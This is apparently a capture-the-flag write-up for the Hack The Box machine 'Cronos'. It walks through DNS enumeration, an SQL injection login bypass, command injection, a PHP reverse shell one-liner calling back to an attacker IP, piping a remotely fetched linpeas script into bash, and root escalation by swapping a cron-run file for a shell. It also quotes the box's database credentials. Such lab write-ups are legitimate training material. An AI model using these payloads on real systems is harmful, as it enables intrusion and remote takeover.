Summary
This was a great machine that did not provide anything too challenging or obscure which I really appreciated. It did however test many techniques from DNS enumeration, to sqli, command injection, and priv esc. The DNS enumeration provided us with new targets that were vulnerable to SQL injection login by passing, from which command injection provided a user shell. From here I escalated to root with a kernal exploit found with "uname -a", as well as a second path of replacing the "artisan" file being continually executed by root.
Tools used
Linepeas
Processes/techniques
DNS enumeration with dig
Command injection with a reverseshell
Execute linpeas from memory "curl -s http://"ip":port/linpeas.sh | bash
Replace file being execute by cron job with a shell
Recon
Fairly straight forward with a DNS and a webserver.
Enumeration: DNS
I tried using several DNS enumeration tools without any luck. Generally in HTB you update your /etc/hosts file with the individual box name as the nameserver. So for good practice I eventually added cronos.htb to my /etc/hosts file and re-ran dns enumeration with many result.
We add all these servers to our /etc/hosts file.
10.129.30.241 admin.cronos.htb ns1.cronos.htb www.cronos.htb cronos.htb
There was little on the main page but the admin page was accepting credentials.
A little sql injection for the win!
Login with ' OR 1 -- -
With command injection we can use ;command
Reverse shell
I tried bash, netcat and finally php worked. The traceroute command was appended with a revershell. 8.8.8.8;code here.
php -r '$sock=fsockopen("10.10.14.120",6363);exec("/bin/sh -i <&3 >&3 2>&3");'
We find creds in the landing folder for a DB
admin
kEjdbRigfBHUREiNSDs
This lead me to nowhere so we proceeded to enumeration.
Privilege escalation
From here we use the usual linpeas to enumerate the target system. In order to remain under the radar we will execute linpeas from memory instead of from the HDD.
Curl -s http://10.10.14.120:8000/linpeas.sh | bash
I noticed this while scrolling through linpeas and it looks promising according the linpeas as per the "highlighted in yellow" and the fact that root is running something from a user folder on a schedule.
I attempted to edit the artisan file and after some time I had no luck. So I eventually deleted it, and copied a php reverseshell in its location and name and this game me root access.
There was also a kernal exploit that could of been identified with uname -a
Comments